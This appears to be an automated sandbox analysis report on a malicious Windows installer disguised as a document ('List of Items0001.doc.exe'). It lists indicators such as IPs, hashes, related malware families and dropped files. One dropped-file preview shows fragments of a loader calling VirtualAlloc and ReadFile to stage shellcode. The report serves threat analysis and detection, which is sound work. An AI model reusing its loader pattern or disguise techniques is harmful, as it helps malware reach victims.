                            BL Draft-Invoice-Packing list-Shipping Document.pif.exeGet hashmaliciousFormBookBrowse
                            • 62.149.128.40
                            https://primesportnews.co.uk/Get hashmaliciousUnknownBrowse
                            • 94.177.185.122
                            Purchase Order_ AEPL-2324-1126.exeGet hashmaliciousFormBookBrowse
                            • 62.149.128.40
                            F0F0LjrOzL.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                            • 80.211.144.156
                            jQ2ryeS5ZP.exeGet hashmaliciousPureCrypter, Revenge, CyberGate, DCRat, GuLoader, Njrat, PureLog StealerBrowse
                            • 80.211.144.156
                            jade.arm6.elfGet hashmaliciousMiraiBrowse
                            • 95.110.130.123
                            jade.ppc.elfGet hashmaliciousMiraiBrowse
                            • 95.110.130.105
                            jade.x86.elfGet hashmaliciousMiraiBrowse
                            • 94.177.219.246
                            FYI.PDF.exeGet hashmaliciousFormBookBrowse
                            • 62.149.128.40

                            JA3 Fingerprints

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            37f463bf4616ecd445d4a1937da06e19____.vbsGet hashmaliciousGuLoader, LokibotBrowse
                            • 162.213.195.46
                            file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
                            • 162.213.195.46
                            DIR-A_FB09948533#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                            • 162.213.195.46
                            SIGN_23930581750#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                            • 162.213.195.46
                            Windows.exeGet hashmaliciousUnknownBrowse
                            • 162.213.195.46
                            Windows.exeGet hashmaliciousUnknownBrowse
                            • 162.213.195.46
                            BA4M310209H14956.docx.docGet hashmaliciousUnknownBrowse
                            • 162.213.195.46
                            Justificante_13087.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                            • 162.213.195.46
                            1727114467571b3cff3c211c4c82d9a0b19f699c490bb1ae02e7211cca2c408f67a0398b9c830.dat-decoded.exeGet hashmaliciousUnknownBrowse
                            • 162.213.195.46
                            1727114467571b3cff3c211c4c82d9a0b19f699c490bb1ae02e7211cca2c408f67a0398b9c830.dat-decoded.exeGet hashmaliciousUnknownBrowse
                            • 162.213.195.46

                            Dropped Files

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll1Gqt1JqOZN.exeGet hashmaliciousUnknownBrowse
                              SecuriteInfo.com.W32.PossibleThreat.20282.14864.exeGet hashmaliciousUnknownBrowse
                                SecuriteInfo.com.W32.PossibleThreat.20282.14864.exeGet hashmaliciousUnknownBrowse
                                  f_00622c.exeGet hashmaliciousUnknownBrowse
                                    https://github.com/angryip/ipscan/releases/download/3.9.1/ipscan-3.9.1-setup.exeGet hashmaliciousUnknownBrowse
                                      47#U0627.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                        Request for Quotation - sample catalog.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                          47#U0627.vbsGet hashmaliciousGuLoaderBrowse
                                            Request for Quotation - sample catalog.vbsGet hashmaliciousGuLoaderBrowse

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Temp\2409l6-1

                                              Download File
                                              Process:C:\Windows\SysWOW64\TapiUnattend.exe
                                              File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 6, database pages 109, cookie 0x62, schema 4, UTF-8, version-valid-for 6
                                              Category:dropped
                                              Size (bytes):229376
                                              Entropy (8bit):0.9085960794285802
                                              Encrypted:false
                                              SSDEEP:384:HfKCsnNjzI63PG43lAfKIq9JvOeMZHIXI:HDsndzn/G43lAfKIq9JtmHIX
                                              MD5:17091CB4BC9C6E80CA91C12E0BBA56F4
                                              SHA1:ED7E485630B1245C7AE963FB02C899BF141DB578
                                              SHA-256:551A6521FF9A83FDB18EFB95916A74A45600A427911FE4E1BD59A2795A1EF814
                                              SHA-512:A5752E9BE8E233026C6378521127014EDD395F44AFB3C5F078300783792AEFEF1C6D08C4B63923DF9FD5AF7A1653F994677BCC40D9CF7636B26A6461F6172A4A
                                              Malicious:false
                                              Reputation:low
                                              Preview:SQLite format 3......@ .......m...........b......................................................v............i........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll

                                              Download File
                                              Process:C:\Users\user\Desktop\List of Items0001.doc.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):12288
                                              Entropy (8bit):5.814115788739565
                                              Encrypted:false
                                              SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                              MD5:CFF85C549D536F651D4FB8387F1976F2
                                              SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                              SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                              SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Joe Sandbox View:
                                              • Filename: 1Gqt1JqOZN.exe, Detection: malicious, Browse
                                              • Filename: SecuriteInfo.com.W32.PossibleThreat.20282.14864.exe, Detection: malicious, Browse
                                              • Filename: SecuriteInfo.com.W32.PossibleThreat.20282.14864.exe, Detection: malicious, Browse
                                              • Filename: f_00622c.exe, Detection: malicious, Browse
                                              • Filename: , Detection: malicious, Browse
                                              • Filename: 47#U0627.vbs, Detection: malicious, Browse
                                              • Filename: Request for Quotation - sample catalog.vbs, Detection: malicious, Browse
                                              • Filename: 47#U0627.vbs, Detection: malicious, Browse
                                              • Filename: Request for Quotation - sample catalog.vbs, Detection: malicious, Browse
                                              Reputation:high, very likely benign file
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Temp\nsvAFA8.tmp

                                              Download File
                                              Process:C:\Users\user\Desktop\List of Items0001.doc.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1080908
                                              Entropy (8bit):2.875605533482657
                                              Encrypted:false
                                              SSDEEP:6144:z96o0LGroRBMdAphQPkzYLhxOpDew3C89JhfXzf6:z9TCvQPHL4aw3pf6
                                              MD5:525F2C194B2522306F9CBBAF72EB65BE
                                              SHA1:A436849F9F85390C60E751B361896AB962AC1115
                                              SHA-256:4051A1EA370F0B8FEABEF0DF3104AB6CC0584E42A8A26EF730A29313F3625256
                                              SHA-512:44702EDB2C29EC7112C1A06AD93983AC22D6C97F288D76B74624C7BA409F25048A385F6EC50E3A972C0F7C65A9DD7742797E3D3C9C04F2BE09556698461FC6F0
                                              Malicious:false
                                              Reputation:low
                                              Preview:."......,...................r...<........"......."..........................................................................................................................................................................................................................................G...J...............j...........................................................................................................................................D...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Raveler22\Inbetweener.Dou

                                              Download File
                                              Process:C:\Users\user\Desktop\List of Items0001.doc.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):206833
                                              Entropy (8bit):7.338969359279965
                                              Encrypted:false
                                              SSDEEP:3072:kasfm803icQJrRdwRBMdM4EphQPZeu7UzYbgohSF8XZYX5Dew3v:Po0LGroRBMdAphQPkzYLhxOpDew3v
                                              MD5:3D055AFB37E16E88BADB32DE3B201909
                                              SHA1:3B91D1FF871C97C4AB6AAFEEB3E05DA7AF6D0596
                                              SHA-256:8A6D99C63BEC12EE848D9549A01841BE447A929AC077F9D18100858688EC30B7
                                              SHA-512:25B11673EF9B9C3BF77A8ED6E9EC2B41B58FF01849B86E0970709484CA3BFCDD325336B9FCF53FFE34C2018ADA9575BEDCBF4D27A9141E5B58265971DC2C0D30
                                              Malicious:false
                                              Preview:....:......^^^^^^^^......9.M....LLL....^.........NN.....::..................BBB..........{..........---.SS......==....`..VVV..\.........1............X.........................xx....yyy....R............SSS..........$$................2.SS...........i............`..............!!...ll.GG...............ZZ............f........Y../.}}......................iii......8..F.LL..9.$$..[[[..77.....7..............PPP..............y........{."".TTTT..999.......33...C...................................2.....J..................f....4............................__.............................mm................................{.......................RR................YYY.....66....!.........>...................................A...........X.............../."..O..;..)......;.....44.....V..........6...zzz.........$.....................UUUU.AA.3............f....@@@...!!!..z.......H............e.O..................zz........4.0......:.{.WW.1....r.................L.................../..........................

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Raveler22\Juleroses.Ban

                                              Download File
                                              Process:C:\Users\user\Desktop\List of Items0001.doc.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):8667
                                              Entropy (8bit):4.47483795532895
                                              Encrypted:false
                                              SSDEEP:96:NgJmkFdWaDvgS7Yw0kBFKRftSFOAuiYI9vhFcA7Mb7rJdnK6LUgV:6s+4yp7HKLE9vhPQHSk
                                              MD5:FB58B8D630794DA1796812AE1E089756
                                              SHA1:41D5D5FAB4C3685F143C80C07099FFD9D85B3F92
                                              SHA-256:1679776C0F6F48276496D575BCB8B927CF547A40F1BCDCF1957A1B7FAA2FE010
                                              SHA-512:CA20D1ED9CBACEEACDE617A31C67D28E6AC314C58F230243AEE00AE8D92850CFABFD96105F89E7D32CE7157F9C3E4B02881351DB01C9D908505E3AC8F5589134
                                              Malicious:false
                                              Preview:...++++.!!...qq.......p.........t.o.............G......q...........v.w.........................k.l.e..Xr...n..pe.>>l.nn3..02...:...:...C...r...e.p.a...t...e...F...i...l...e...A...(...m... ...r...4... ...,.%. ...i... .!!0...x...8...0..G0..M0...0...0...0...0...,... ...i... ..,0...,... ...p... .*.0...,..! ...i... ...4...,... ...i... ...0.**x...8...0...,... ...i... ...0...)...i.....oor...8.......k...e..hr..8n...e...l...3..|2...:...:...S...e...t...F...i...l...e...P..Do...i...n...t...e...r...(...i... ..Wr.,.8..%,.'' ...i... ..02...3.C.0.yy1...2..h ...,... ...i... ...0...,...i.\. ...0...)...i.......r...4.......k...e...r...n...e...l...3...2.<.:...:...V.._i...r...t...u...a...l...A...l...l..4o...c...(...i... ...0...,...i... ...1...2...6...6..t4...8...3.,.2...,..Z .ssi... ...0.v.x...3...0.O.0...0...,... ...i... .220...x...4...0...)...p......ur...2.......k...e...r...n...e...l..'3...2..C:.2.:...R...e...a...d...F...i..Ol...e...(...i... ...r...8...,... ...i... ..ur..s2...,... ...i... .).1...2...6...6

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Raveler22\auxochromous.oph

                                              Download File
                                              Process:C:\Users\user\Desktop\List of Items0001.doc.exe
                                              File Type:Matlab v4 mat-file (little endian) \371, numeric, rows 0, columns 0
                                              Category:dropped
                                              Size (bytes):377510
                                              Entropy (8bit):1.258274749344514
                                              Encrypted:false
                                              SSDEEP:768:GhGocb02kUfCQgJQDnBntGgPsKU8ujjrf4Sfraf2bTtnCIXI6qnpqsM7a3U1coe3:G29XJZYjwfg22ye0E3l24lM
                                              MD5:4687ED84FC3526E5A36E3D15034E780C
                                              SHA1:7C1FDD5DACE796E5000B55FDCA8B0D8E80AB4107
                                              SHA-256:FEFDA5AF3BFAE55E417CEBABC38D62F287F6827ED742B0C91B1AF7DAD3DDF9D9
                                              SHA-512:E8DB150309F268BAAD995B1B247768821096843E4FAE025020FCAA68E038902E0023128C9CE06A0B3322ED99A1A2423E087F6736F51F85E47514676DFF0060D2
                                              Malicious:false
                                              Preview:.........................c..........................................................................................................X..........................................B..........................................?..................0.................................3...........................................F........................]................................... ........j..........................................................F.Y.......q...l..........<.............v.....................................Y.................O....P......................4..v..........X.............x................X......................j.............................................................................................................................................................T.........................................................................................n...........M................................................#................g....P.................................

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Raveler22\enteroviral.uro

                                              Download File
                                              Process:C:\Users\user\Desktop\List of Items0001.doc.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):6476
                                              Entropy (8bit):1.3027420820992792
                                              Encrypted:false
                                              SSDEEP:48:Xuy2tvaXLsWkXsiltrNmaimTdF+YdaWPO:+Jdaw/vRmbmTdFddaWPO
                                              MD5:6834FEE46C2094A680AFBE721BCD6CD3
                                              SHA1:040EBC023C6BC9A13948730D79E73A0BA9A57B65
                                              SHA-256:F52C9A95E500444E13A10DD9DACD739ED6035E18DA0FCB92F3346D8D33A5E976
                                              SHA-512:307A2C0F978F41C8DB546151E9A1E170813056B9B2E7D3D8F2A65BD7413BC5B54E90FD9810D054383A3F730B6CB61BDC37B2B12A4BD5E8425C5E214232F7E030
                                              Malicious:false
                                              Preview:]......W..C..................................6.................................................................................)........................................>.........r.......c.............r....k.....Z.............}..................j..Y........................,........................P.........V.......................f.....'..................c.....t......................-.........k.............x....................j....................................p........r.....(........................3..................V....V..........................................R..........................................<.................................................A.....L.....................*.......V....................b...............p........................................................................................h.................................................................................T.....................................H................................................K.

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Raveler22\miscibility.gly

                                              Download File
                                              Process:C:\Users\user\Desktop\List of Items0001.doc.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):119598
                                              Entropy (8bit):1.2437975192637685
                                              Encrypted:false
                                              SSDEEP:768:crjGZ7nfcv98Sc6/OhLWGtyl0fJdbYmpsdwJMXf0AZIqYaN/Pa:qF8ywBWp0Wa
                                              MD5:ADAF3D47FB43EB83807A8951C454FA92
                                              SHA1:3743EF34102EE1FAFF632A73BD0172FCE0C97D30
                                              SHA-256:70B10041BEDF91AC13DCA35C252B4B407B5E22DC4FBD5C94AB28FA4A4AFAB85B
                                              SHA-512:2B966878DA94F956E0DEA31C1C679F35C06CFE8B04B31EBD55FC46799C8E4F2F050AA15040237533A72EF0B8DFBF5484C229A3F28F4808200222722F7CD84E28
                                              Malicious:false
                                              Preview:...........4.............r.........................p..6...................?..........................................................................................,....................N....................4..............................^..............................#.................4.......W..........................................L.............1........................................`.....h..........,......................Q...........................m...................2.........O................................................o..................4.......s.l............. ................N.......................................................................................................m......................................................................................._..O........................C.............&...........................................................v.......&...................................................................|.............................

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Raveler22\preshrinked.sta

                                              Download File
                                              Process:C:\Users\user\Desktop\List of Items0001.doc.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):207803
                                              Entropy (8bit):1.2442537982642219
                                              Encrypted:false
                                              SSDEEP:768:lYuBHkWBnyhlGVFYv6mBTFHO0MweR2iicYDXm58MkWhWzNNzUD0I8NJ1PQDE65d/:6z6KqM6
                                              MD5:7605A8B0A0B86CE8D9BAD360EAC35323
                                              SHA1:2CAF427A0458A06D127FB5984B6F8C78F8CC8143
                                              SHA-256:4FD04112F16EC0A2179F096272D24E9F61C97376CC7A4466E7CA5562CA48B0B5
                                              SHA-512:15C5B1EBFEB646087B01919331CAA2B1651E4B0F2021BDCDC44C4CDE2D48011936A80E13EDC3A47A24489C04EEA1CDBECD10FFF151A049606C71A46B953E2F9F
                                              Malicious:false
                                              Preview:....4.........e......................................................x.......................................................................{....1..................................X........K...............................;......../.........................-.....................x.............................................................#..R............)..........................[..............'............e.^.......;.......c......!..................n......................................-...........:.................................................\..............................0,.............................................c..................................................................(.........................................................................Z.........................................f......O..................$.......P.-............Y...... ..............|..................................................................r............................f..............

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Raveler22\pythons.zym

                                              Download File
                                              Process:C:\Users\user\Desktop\List of Items0001.doc.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):112920
                                              Entropy (8bit):1.269802012029701
                                              Encrypted:false
                                              SSDEEP:768:uGPdsi4uzEUQ40kJIoRDm/9vvpv72md42nQi+2l+:L4HkI2Yv4mdbpw
                                              MD5:C12622250F68D3ED555732D69367D4B2
                                              SHA1:936B6ED917DF066689CAE99C9621230023A86CC2
                                              SHA-256:599EF46FC90AD1B47CF05FC8DB7FA9D7EBA17905F6711BF2D53EA1E229756DDC
                                              SHA-512:D1B643D3B4432FA27DCCF6D9F7BF5ACC73A38B6A169AF9F56A473D010C205C931FBECF2B9A7854973998D96A752C32336953E7F5C1629C70451AA12A613356B0
                                              Malicious:false
                                              Preview:.......................+......~?.......&..............D........................................E..k..p..R..........|............................J......................x.....................+........]....4...................M./................?........7....;..>..........................................;#.......................................0...p...g#...................................................d................................................................................q.............T........................2..-.......................W............m...)...................................................Z...............................2.............................T...................................{.................................................................................................)........K.....vg.......[.......".........................................................................~.............................................................................

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Raveler22\regimers.unh

                                              Download File
                                              Process:C:\Users\user\Desktop\List of Items0001.doc.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):19333
                                              Entropy (8bit):1.2883608656481567
                                              Encrypted:false
                                              SSDEEP:96:44Qnmg2gF2DaU1b5tJPzgnA0tZiP54wYinr7C9lUhAZtnytK:41nVy11lPzgASiP5/Yw7QuAZktK
                                              MD5:655BCB5400852532F15210B2845BBE47
                                              SHA1:9C090B377ED197C11FDAE3388D2E0B2A57CE0441
                                              SHA-256:EBAE19C75FB454BC179D2DC010E8C8C78DCA2F6E46F157FA143737A5FF7DE449
                                              SHA-512:1E22606392BAFDE72710E0B6D0A18F92BAEE3D7B91A80AB73B1A54BFDB7B5606B0A852ABE82169EA378B5F093CB529EB0F97FBEF90776D2085FA6D943DF990CA
                                              Malicious:false
                                              Preview:..,........................................N..............................................H..........i.......................T.........................................................S..................e.e..........................................................|........................................n...............D.............................................................r.........6...............................l..........................Y......^...........................................b..............v....................h.....................(.................................*..........................................................R........V............................1...-#......S........................................U...............................................................E...............E...................K.........G.................................E..............!......................................................................................R.....H..

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Raveler22\wedders.txt

                                              Download File
                                              Process:C:\Users\user\Desktop\List of Items0001.doc.exe
                                              File Type:ASCII text, with very long lines (361), with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):471
                                              Entropy (8bit):4.179338005320388
                                              Encrypted:false
                                              SSDEEP:6:rlP8QkBAMyzshoUR2YmgeqBSSjrqtNAXapaV/GDFcsxwqCKewWaE9tmAtzFpUpcf:91kyMf+ONwSaSXKaZQfwT9LzF4E
                                              MD5:2DB25422A7D25E430640B19479BA11A7
                                              SHA1:43772910A8A6BCD716F1E627E35DE5F3FCA29A4B
                                              SHA-256:AD7C29CC9DCD5293AA5F7328C5F2C93004497EAF4816BB8B72F2FAB7A36D4BFB
                                              SHA-512:1A4CB182DCB01D3D29DF1ECEDF40254A2A30D8291D52DD73BA7F34B0E41145E512B5DCC02E2321916FFCF7A44E6D84E1976C93A7A74CE81A61073801FA7B698F
                                              Malicious:false
                                              Preview:bents fdemiddelet zydecos wirings disallowed seniorerne neuralgy maleriske krogsternes anlggenes paaskelrdag..skruegangenes vault xantheins chefkonomernes svrmetidernes internationale,cosinesses orddelingsprogram solstraalefortlling peytrels crucibles sandbankernes nationaliseres,aronsson fastkurs crpe teaterforestillings oxynaphthoic,storifying faveolate turgesce renovationsarbejderes indvarsler trdemller unuanceredes,poolenes alif bespottelsernes bioassays danisme,

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Entropy (8bit):7.2747241603356665
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:List of Items0001.doc.exe
                                              File size:632'024 bytes
                                              MD5:6d3da95a3e1f5861a54c30dd61f80c02
                                              SHA1:74e6fb42c2de33b6b9dcd45aa86db1b99c8c2135
                                              SHA256:9c2d1e2dc9170158a8fef8393fd58306f918ceb15701465c4e21040be94233c2
                                              SHA512:70c23ed78a8d369c78073504d6bc4b5fd1ee89e7708318706d4c4108e2d2257381634b12326d546eb51c76fefc0d98cf7863c4ac6bc7857dfe46217ce4a87302
                                              SSDEEP:6144:YYa6vEsNe5YZ0thEQftDn2IeudqgiYxOJ2Hd2Wn49rVzOpb4o4/aZJZCrXmxhz3f:YY+T5LbtDOgiYQQ9tUVm4d2d5c737+
                                              TLSH:35D4D0A3BD98CDA6FC6A5070B42E5557EBF11DF3D291893BB4D2FE1A4032287041B25B
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....

                                              File Icon

                                              Icon Hash:3b71b88888f83448

                                              Static PE Info

                                              General

                                              Entrypoint:0x403640
                                              Entrypoint Section:.text
                                              Digitally signed:true
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:61259b55b8912888e90f516ca08dc514

                                              Authenticode Signature

                                              Signature Valid:false
                                              Signature Issuer:CN="Antennernes antisubmarine ", O=Bagerierne, L=Rennes, S=Bretagne, C=FR
                                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                              Error Number:-2146762487
                                              Not Before, Not After
                                              • 28/10/2023 06:29:24 27/10/2026 05:29:24
                                              Subject Chain
                                              • CN="Antennernes antisubmarine ", O=Bagerierne, L=Rennes, S=Bretagne, C=FR
                                              Version:3
                                              Thumbprint MD5:57377B73AE53C9FF7C3BB15F7883BDC5
                                              Thumbprint SHA-1:DA4B86C194BEB9A8A47B0BFAFCF7E3CAA16B0493
                                              Thumbprint SHA-256:B85E5E87CAB310946438AF4DA9E79E1164853C6C4FA39B888FF1F58A3D4A80EA
                                              Serial:1C3CD644B75CB8DEB5BAD2BF0CCA5725FE244D32

                                              Entrypoint Preview

                                              Instruction
                                              push ebp
                                              mov ebp, esp
                                              sub esp, 000003F4h
                                              push ebx
                                              push esi
                                              push edi
                                              push 00000020h
                                              pop edi
                                              xor ebx, ebx
                                              push 00008001h
                                              mov dword ptr [ebp-14h], ebx
                                              mov dword ptr [ebp-04h], 0040A230h
                                              mov dword ptr [ebp-10h], ebx
                                              call dword ptr [004080C8h]
                                              mov esi, dword ptr [004080CCh]
                                              lea eax, dword ptr [ebp-00000140h]
                                              push eax
                                              mov dword ptr [ebp-0000012Ch], ebx
                                              mov dword ptr [ebp-2Ch], ebx
                                              mov dword ptr [ebp-28h], ebx
                                              mov dword ptr [ebp-00000140h], 0000011Ch
                                              call esi
                                              test eax, eax
                                              jne 00007FBB70A9EE7Ah
                                              lea eax, dword ptr [ebp-00000140h]
                                              mov dword ptr [ebp-00000140h], 00000114h
                                              push eax
                                              call esi
                                              mov ax, word ptr [ebp-0000012Ch]
                                              mov ecx, dword ptr [ebp-00000112h]
                                              sub ax, 00000053h
                                              add ecx, FFFFFFD0h
                                              neg ax
                                              sbb eax, eax
                                              mov byte ptr [ebp-26h], 00000004h
                                              not eax
                                              and eax, ecx
                                              mov word ptr [ebp-2Ch], ax
                                              cmp dword ptr [ebp-0000013Ch], 0Ah
                                              jnc 00007FBB70A9EE4Ah
                                              and word ptr [ebp-00000132h], 0000h
                                              mov eax, dword ptr [ebp-00000134h]
                                              movzx ecx, byte ptr [ebp-00000138h]
                                              mov dword ptr [0042A318h], eax
                                              xor eax, eax
                                              mov ah, byte ptr [ebp-0000013Ch]
                                              movzx eax, ax
                                              or eax, ecx
                                              xor ecx, ecx
                                              mov ch, byte ptr [ebp-2Ch]
                                              movzx ecx, cx
                                              shl eax, 10h
                                              or eax, ecx

                                              Rich Headers

                                              Programming Language:
                                              • [EXP] VC++ 6.0 SP5 build 8804

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x4f0000x42b28.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x99b700x968
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x66760x68006f5abe9eeda26ee84b3c1ed1a6c82001False0.6568134014423077data6.4174599871908855IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rdata0x80000x139a0x14008c5edfd8ff9cc0135e197611be38ca18False0.4498046875data5.141066817170598IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0xa0000x203780x6004b2421975c21b032f7ea000f5e7f9fbfFalse0.509765625data4.110582127654237IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .ndata0x2b0000x240000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc0x4f0000x42b280x42c0030c07db9666792573bae5eb1979e3a1cFalse0.27640010533707865data5.795862006125686IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_ICON0x4f2080x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishUnited States0.27417004467852174
                                              RT_DIALOG0x912300x100dataEnglishUnited States0.5234375
                                              RT_DIALOG0x913300x11cdataEnglishUnited States0.6056338028169014
                                              RT_DIALOG0x914500xc4dataEnglishUnited States0.5918367346938775
                                              RT_DIALOG0x915180x60dataEnglishUnited States0.7291666666666666
                                              RT_GROUP_ICON0x915780x14dataEnglishUnited States1.1
                                              RT_VERSION0x915900x258dataEnglishUnited States0.53
                                              RT_MANIFEST0x917e80x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                              Imports

                                              DLLImport
                                              ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                              SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                              ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                              COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                              USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
